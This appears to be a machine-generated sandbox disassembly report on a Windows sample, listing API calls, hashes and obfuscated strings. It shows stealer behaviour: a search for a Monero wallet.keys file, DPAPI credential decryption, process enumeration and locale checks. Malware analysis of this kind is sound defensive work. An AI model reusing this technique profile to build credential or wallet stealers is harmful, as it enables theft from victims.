                                   • Associated: 00000000.00000002.1465435754.0000000000F61000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465435754.0000000001011000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465435754.000000000101D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465435754.0000000001042000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465435754.00000000011AA000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465574571.000000000134B000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465574571.000000000142F000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465574571.0000000001451000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465574571.0000000001459000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465574571.0000000001468000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465801333.0000000001469000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465931163.000000000160B000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465953399.000000000160C000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: !$T$1<$?\g$SxY$V9su$nRZi$t+_~$xK_x$@,~
                                  • API String ID: 0-586295527
                                  • Opcode ID: 8c321852ec7e9673240f13510f21cfaed3bff94e56a7626170724f9a63fb8136
                                  • Instruction ID: e8f466e42e3e3304ed4eab503651369eae2c2c7b2bdc857539c89b3141e4bae9
                                  • Opcode Fuzzy Hash: 8c321852ec7e9673240f13510f21cfaed3bff94e56a7626170724f9a63fb8136
                                  • Instruction Fuzzy Hash: 00B2E5F360C204AFE304AF29EC8567ABBE9EF94720F16892DE6C4C7744E63558418797
                                  APIs
                                    • Part of subcall function 00F7A740: lstrcpy.KERNEL32(00F80E17,00000000), ref: 00F7A788
                                  • GetKeyboardLayoutList.USER32(00000000,00000000,00F805AF), ref: 00F77BE1
                                  • LocalAlloc.KERNEL32(00000040,?), ref: 00F77BF9
                                  • GetKeyboardLayoutList.USER32(?,00000000), ref: 00F77C0D
                                  • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00F77C62
                                  • LocalFree.KERNEL32(00000000), ref: 00F77D22
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1465435754.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                   • Associated: 00000000.00000002.1465422002.0000000000F60000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465435754.0000000001011000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465435754.000000000101D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465435754.0000000001042000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465435754.00000000011AA000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465574571.00000000011BE000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465574571.000000000134B000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465574571.000000000142F000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465574571.0000000001451000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465574571.0000000001459000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465574571.0000000001468000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465801333.0000000001469000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465931163.000000000160B000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465953399.000000000160C000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                                  • String ID: /
                                  • API String ID: 3090951853-4001269591
                                  • Opcode ID: 2336e7008c13f54c0bec525e8bbe41474039583c61133ff4c372b51d6febafe2
                                  • Instruction ID: b0ea47014b98e89237e00b1c224373373d44473e7e8286bc83270c37e9366ef0
                                  • Opcode Fuzzy Hash: 2336e7008c13f54c0bec525e8bbe41474039583c61133ff4c372b51d6febafe2
                                  • Instruction Fuzzy Hash: 3E416E71950218ABCB24EB94DC89FEEB774FF48700F60819AE10962181DB342F85DFA2
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1465574571.00000000011BE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                   • Associated: 00000000.00000002.1465422002.0000000000F60000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465435754.0000000000F61000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465435754.0000000001011000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465435754.000000000101D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465435754.0000000001042000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465435754.00000000011AA000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465574571.000000000134B000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465574571.000000000142F000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465574571.0000000001451000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465574571.0000000001459000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465574571.0000000001468000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465801333.0000000001469000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465931163.000000000160B000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465953399.000000000160C000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: +Z:w$-|0S$:?$P3W5$Py_$]@[w$v}
                                  • API String ID: 0-4275929979
                                  • Opcode ID: 9635e437166bdc00673070fa75b8db2579a0b5918680c28320267a09ec334bb0
                                  • Instruction ID: c7a18be1ee87ffffcc1cda8a97a829bd673ab44201f9bb559937ce8288bad08d
                                  • Opcode Fuzzy Hash: 9635e437166bdc00673070fa75b8db2579a0b5918680c28320267a09ec334bb0
                                  • Instruction Fuzzy Hash: 90A2D5F3608204AFD3046E2DEC8567AFBEAEFD4720F1A492DE6C4C3744E63598458697
                                  APIs
                                    • Part of subcall function 00F7A740: lstrcpy.KERNEL32(00F80E17,00000000), ref: 00F7A788
                                    • Part of subcall function 00F7A920: lstrcpy.KERNEL32(00000000,?), ref: 00F7A972
                                    • Part of subcall function 00F7A920: lstrcat.KERNEL32(00000000), ref: 00F7A982
                                    • Part of subcall function 00F7A9B0: lstrlen.KERNEL32(?,016F8A70,?,\Monero\wallet.keys,00F80E17), ref: 00F7A9C5
                                    • Part of subcall function 00F7A9B0: lstrcpy.KERNEL32(00000000), ref: 00F7AA04
                                    • Part of subcall function 00F7A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00F7AA12
                                    • Part of subcall function 00F7A8A0: lstrcpy.KERNEL32(?,00F80E17), ref: 00F7A905
                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,00F80D73), ref: 00F6E4A2
                                  • StrCmpCA.SHLWAPI(?,00F814F8), ref: 00F6E4F2
                                  • StrCmpCA.SHLWAPI(?,00F814FC), ref: 00F6E508
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00F6EBDF
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1465435754.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                   • Associated: 00000000.00000002.1465422002.0000000000F60000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465435754.0000000001011000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465435754.000000000101D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465435754.0000000001042000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465435754.00000000011AA000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465574571.00000000011BE000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465574571.000000000134B000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465574571.000000000142F000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465574571.0000000001451000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465574571.0000000001459000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465574571.0000000001468000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465801333.0000000001469000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465931163.000000000160B000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465953399.000000000160C000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                                  • String ID: \*.*
                                  • API String ID: 433455689-1173974218
                                  • Opcode ID: ec8f9b1fdd379a1430a25c9e075b555077f708a4d463050ef822041e37d466c1
                                  • Instruction ID: eae6f6f41e2b2eaf2e21f9c93e4cb994d198c0029a5940569e9febf64220d284
                                  • Opcode Fuzzy Hash: ec8f9b1fdd379a1430a25c9e075b555077f708a4d463050ef822041e37d466c1
                                  • Instruction Fuzzy Hash: FE1246729101189ADB18FB70DC96EEE7338AF94300F4181AAB51E96091EF385F59DF93
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1465574571.00000000011BE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                   • Associated: 00000000.00000002.1465422002.0000000000F60000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465435754.0000000000F61000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465435754.0000000001011000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465435754.000000000101D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465435754.0000000001042000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465435754.00000000011AA000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465574571.000000000134B000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465574571.000000000142F000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465574571.0000000001451000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465574571.0000000001459000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465574571.0000000001468000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465801333.0000000001469000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465931163.000000000160B000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465953399.000000000160C000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: 9W_$_-}v$d_;$m-8}$m/$$}
                                  • API String ID: 0-2263078821
                                  • Opcode ID: 5d2b4a4f1dc2027072e7d04ef0146df73f9c4bed647759bc0c226b7aecf3a989
                                  • Instruction ID: ceb97d0f22450c883621fa87455045ad0f96880f4b9afcaa9792f72c2c891deb
                                  • Opcode Fuzzy Hash: 5d2b4a4f1dc2027072e7d04ef0146df73f9c4bed647759bc0c226b7aecf3a989
                                  • Instruction Fuzzy Hash: C0B226F350C2049FE304AE29EC8567ABBE5EF94720F1A893DEAC4C7744E63598058797
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1465574571.00000000011BE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                   • Associated: 00000000.00000002.1465422002.0000000000F60000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465435754.0000000000F61000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465435754.0000000001011000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465435754.000000000101D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465435754.0000000001042000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465435754.00000000011AA000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465574571.000000000134B000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465574571.000000000142F000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465574571.0000000001451000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465574571.0000000001459000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465574571.0000000001468000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465801333.0000000001469000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465931163.000000000160B000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465953399.000000000160C000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: U{$Z&t$^o~$`C;{$xb;
                                  • API String ID: 0-4025509837
                                  • Opcode ID: 7cd347e1a83a74c54f541fa5de7062a539167ba5ed970f0827bcdbadb54e468e
                                  • Instruction ID: 66945da1f36508907110de4a559ec20e5711df1b6590d3e81b230c98328ec2eb
                                  • Opcode Fuzzy Hash: 7cd347e1a83a74c54f541fa5de7062a539167ba5ed970f0827bcdbadb54e468e
                                  • Instruction Fuzzy Hash: 1DB218F360C2009FE3046E2DEC8567ABBE9EFD4720F1A893DE6C5C7744EA3558418696
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1465574571.00000000011BE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                   • Associated: 00000000.00000002.1465422002.0000000000F60000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465435754.0000000000F61000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465435754.0000000001011000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465435754.000000000101D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465435754.0000000001042000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465435754.00000000011AA000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465574571.000000000134B000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465574571.000000000142F000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465574571.0000000001451000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465574571.0000000001459000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465574571.0000000001468000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465801333.0000000001469000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465931163.000000000160B000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465953399.000000000160C000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: =)oK$A.Ky$E`M-$d-!$z0/
                                  • API String ID: 0-3894838556
                                  • Opcode ID: dda6d5a72d335ae911eab0ea27ef2de1bb6c758e73bcb8e5b499378ff3ae91bf
                                  • Instruction ID: 234cc3115e12b2e5a7aed77b55ff47f5b115726f36b7daaf6fa61dc7c8ed93d4
                                  • Opcode Fuzzy Hash: dda6d5a72d335ae911eab0ea27ef2de1bb6c758e73bcb8e5b499378ff3ae91bf
                                  • Instruction Fuzzy Hash: 6CB227F3A0C2049FE304AF2DEC8567ABBE9EF94720F16493DEAC5C7744E63558018696
                                  APIs
                                  • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 00F6C871
                                  • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 00F6C87C
                                  • lstrcat.KERNEL32(?,00F80B46), ref: 00F6C943
                                  • lstrcat.KERNEL32(?,00F80B47), ref: 00F6C957
                                  • lstrcat.KERNEL32(?,00F80B4E), ref: 00F6C978
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1465435754.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                   • Associated: 00000000.00000002.1465422002.0000000000F60000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465435754.0000000001011000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465435754.000000000101D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465435754.0000000001042000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465435754.00000000011AA000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465574571.00000000011BE000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465574571.000000000134B000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465574571.000000000142F000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465574571.0000000001451000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465574571.0000000001459000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465574571.0000000001468000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465801333.0000000001469000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465931163.000000000160B000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465953399.000000000160C000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$BinaryCryptStringlstrlen
                                  • String ID:
                                  • API String ID: 189259977-0
                                  • Opcode ID: 84a317b99d7677ef83d73526f86dedf6bf18fe624b97e6d1bd399e3299bf239e
                                  • Instruction ID: 95233fa6afaf30f7f19d69fb90ca8d7f326cd652a6ec9e9cb9871ad2c57ca449
                                  • Opcode Fuzzy Hash: 84a317b99d7677ef83d73526f86dedf6bf18fe624b97e6d1bd399e3299bf239e
                                  • Instruction Fuzzy Hash: 72416E75D04219DBDB10DFA0DD89BFEBBB8AF88304F5041A8E509A7280D7705A84DF91
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000008,00000400), ref: 00F6724D
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00F67254
                                  • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00F67281
                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 00F672A4
                                  • LocalFree.KERNEL32(?), ref: 00F672AE
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1465435754.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                                  • String ID:
                                  • API String ID: 2609814428-0
                                  • Opcode ID: ebbdabffd9e7712e17428e3d5a21092150bc7fbd2e089eccc5142e851d71afa8
                                  • Instruction ID: bd81b3348061fab52bde2d7eeabd74cd5e4141832cf13cea3836795fa274e66d
                                  • Opcode Fuzzy Hash: ebbdabffd9e7712e17428e3d5a21092150bc7fbd2e089eccc5142e851d71afa8
                                  • Instruction Fuzzy Hash: 070140B5A40308BBDB24DFD4DD45F9E7B78AB44B05F104054FB15AB2C4DA70AA40CB64
                                  APIs
                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00F7961E
                                  • Process32First.KERNEL32(00F80ACA,00000128), ref: 00F79632
                                  • Process32Next.KERNEL32(00F80ACA,00000128), ref: 00F79647
                                  • StrCmpCA.SHLWAPI(?,00000000), ref: 00F7965C
                                  • CloseHandle.KERNEL32(00F80ACA), ref: 00F7967A
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1465435754.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                  • String ID:
                                  • API String ID: 420147892-0
                                  • Opcode ID: a49ee18948a7dd3a777b0d5e1393912829560877fe3e6767cd8d2d00c5ec2751
                                  • Instruction ID: 0e7d3953203187dd591e5c5c5c3a029ed050dd89b86c6fac3b93ea5d46aeb59f
                                  • Opcode Fuzzy Hash: a49ee18948a7dd3a777b0d5e1393912829560877fe3e6767cd8d2d00c5ec2751
                                  • Instruction Fuzzy Hash: A0015E75A00208EBCB24DFA4DC58BEEBBF8EF0C311F008299A90A97240D7749B80DF51
                                  APIs
                                    • Part of subcall function 00F7A740: lstrcpy.KERNEL32(00F80E17,00000000), ref: 00F7A788
                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00F805B7), ref: 00F786CA
                                  • Process32First.KERNEL32(?,00000128), ref: 00F786DE
                                  • Process32Next.KERNEL32(?,00000128), ref: 00F786F3
                                    • Part of subcall function 00F7A9B0: lstrlen.KERNEL32(?,016F8A70,?,\Monero\wallet.keys,00F80E17), ref: 00F7A9C5
                                    • Part of subcall function 00F7A9B0: lstrcpy.KERNEL32(00000000), ref: 00F7AA04
                                    • Part of subcall function 00F7A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00F7AA12
                                    • Part of subcall function 00F7A8A0: lstrcpy.KERNEL32(?,00F80E17), ref: 00F7A905
                                  • CloseHandle.KERNEL32(?), ref: 00F78761
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1465435754.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                                  • String ID:
                                  • API String ID: 1066202413-0
                                  • Opcode ID: 42f8ef88e8620d4e4e676c12a86b7c9f9478893b88d35f10cc077f24a9bcee14
                                  • Instruction ID: 66df61d542e11d95c5d27075016048e8cbfbaecc54bc0036b74b7a47ef29db1a
                                  • Opcode Fuzzy Hash: 42f8ef88e8620d4e4e676c12a86b7c9f9478893b88d35f10cc077f24a9bcee14
                                  • Instruction Fuzzy Hash: DD316D71901218ABCB28EF54DC45FEEB778EF84700F5081AAE11EA2190DF346A45DFA2
                                  APIs
                                  • CryptBinaryToStringA.CRYPT32(00000000,00F65184,40000001,00000000,00000000,?,00F65184), ref: 00F78EC0
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1465435754.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: BinaryCryptString
                                  • String ID:
                                  • API String ID: 80407269-0
                                  • Opcode ID: 95684035a6e977c369e35aec698ca54e44d2323b92107c64c34ca179113636d0
                                  • Instruction ID: fc4b768ee21868949790f4c1db9827463280fe4b5456e21563d3f5978ddd3934
                                  • Opcode Fuzzy Hash: 95684035a6e977c369e35aec698ca54e44d2323b92107c64c34ca179113636d0
                                  • Instruction Fuzzy Hash: AD111F71240205BFDB04CF64E888FBB37A9AF89750F10D459F9198B240DB35EC82EB61
                                  APIs
                                  • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00F64EEE,00000000,00000000), ref: 00F69AEF
                                  • LocalAlloc.KERNEL32(00000040,?,?,?,00F64EEE,00000000,?), ref: 00F69B01
                                  • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00F64EEE,00000000,00000000), ref: 00F69B2A
                                  • LocalFree.KERNEL32(?,?,?,?,00F64EEE,00000000,?), ref: 00F69B3F
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1465435754.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: BinaryCryptLocalString$AllocFree
                                  • String ID:
                                  • API String ID: 4291131564-0
                                  • Opcode ID: c1a1de6496c51c6391b13130e843473994b2cf91a2990f1aadfe924fab73c664
                                  • Instruction ID: 05014c502e393d84ce16b2ef823240a51a42aac6de8a430ec68ae53d415985f2
                                  • Opcode Fuzzy Hash: c1a1de6496c51c6391b13130e843473994b2cf91a2990f1aadfe924fab73c664
                                  • Instruction Fuzzy Hash: 5611D4B4640208AFEB14CF64D895FAA77B9FB89B11F208058F9159B384C7B1AA41DB50
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00F80E00,00000000,?), ref: 00F779B0
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00F779B7
                                  • GetLocalTime.KERNEL32(?,?,?,?,?,00F80E00,00000000,?), ref: 00F779C4
                                  • wsprintfA.USER32 ref: 00F779F3
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1465435754.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateLocalProcessTimewsprintf
                                  • String ID:
                                  • API String ID: 377395780-0
                                  • Opcode ID: d28d7e90658857e65ecc7bad53e42f7725499d6723d4e8beabe6948595711dac
                                  • Instruction ID: 8f1d93e842513fbde3850f93d8f21e9bc63f341e727d0d62512b4c6c2d3fd188
                                  • Opcode Fuzzy Hash: d28d7e90658857e65ecc7bad53e42f7725499d6723d4e8beabe6948595711dac
                                  • Instruction Fuzzy Hash: 05113CB2904118ABCB14DFD9E945BBEBBF8FB4CB12F10411AF615A2284D3395940DBB1
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,016FDD60,00000000,?,00F80E10,00000000,?,00000000,00000000), ref: 00F77A63
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00F77A6A
                                  • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,016FDD60,00000000,?,00F80E10,00000000,?,00000000,00000000,?), ref: 00F77A7D
                                  • wsprintfA.USER32 ref: 00F77AB7
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1465435754.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                                  • String ID:
                                  • API String ID: 3317088062-0
                                  • Opcode ID: 5dd3c5e1aee46b94c58dad76f5cec84e3ec65acdcfb67773777c9d6da3c55ea7
                                  • Instruction ID: 3ec1561f5e96ce113a0490dd7843b49b596a035ba1887f9824929d65c77f6996
                                  • Opcode Fuzzy Hash: 5dd3c5e1aee46b94c58dad76f5cec84e3ec65acdcfb67773777c9d6da3c55ea7
                                  • Instruction Fuzzy Hash: 791182B1945218DBEB249F54DC45FA9BB78FB44721F1047E6E91A932C0C7785E40CF51
                                  APIs
                                  • CoCreateInstance.COMBASE(00F7E118,00000000,00000001,00F7E108,00000000), ref: 00F73758
                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 00F737B0
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1465435754.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
